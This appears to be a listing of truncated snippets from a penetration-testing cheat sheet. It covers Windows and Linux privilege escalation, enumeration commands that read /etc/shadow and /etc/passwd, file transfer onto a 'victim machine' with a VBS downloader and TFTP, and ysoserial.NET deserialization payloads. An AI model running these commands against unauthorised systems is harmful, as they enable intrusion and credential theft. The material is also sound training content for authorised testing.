First, on Windows systems, we should check the status of the \_AlwaysInstallElevated registry setting. If this key is enabled (set to 1) in either HKEY_CURRENT_USER or HKEY_LOCAL_MACHINE, any user ...

Enumerating Installed Applications and Patch Levels wmic product get name, version, vendor List system-wide updates with Win32_QuickFixEngineering (qfe) wmic qfe get Caption, Description, HotFixI...

Distribution ls /etc/*-release cat /etc/os-release cat /etc/issue uname -a cat /proc/version Interesting files cat /etc/passwd cat /etc/group cat /etc/shadow cat /etc/hosts ls -lh /var/mail/ ls -...

List Cron Jobs cat /etc/crontab && ls -al /etc/cron* Find World-Writable Cron jobs find /etc/cron* -type f -perm -o+w -exec ls -l {} \; Find Cron Jobs Owned by Other Users find /etc/cro...

Upload To upload a file you need to go to the folder where the file is and ONLY use the file name otherwise you’ll receive a 500 error: passive # must be off binary # to upload binaries, execute th...

Writable and executable file In order to leverage insecure file permissions, we must locate an executable file that not only allows us write access but also runs at an elevated privilege level. Use...

From the victim machine command shell use this list of commands: echo strUrl = WScript.Arguments.Item(0) > wget.vbs echo StrFile = WScript.Arguments.Item(1) >> wget.vbs echo Const HTTPREQ...

During a penetration test, we can use TFTP to transfer files from older Windows operating systems up to Windows XP and 2003. This is a terrific tool for non-interactive file transfer, but it is not...

This technique is useful to compress the binary we want to transfer, convert it to a hex string, and embed it into a Windows script. On the Windows machine, we will paste this script into our shel...

Ysoserial.NET ysoserial.NET this tool only works for Windows, after download it we need to identify the format of the binary or program running the code (-g) and the format (-f) that has the deseri...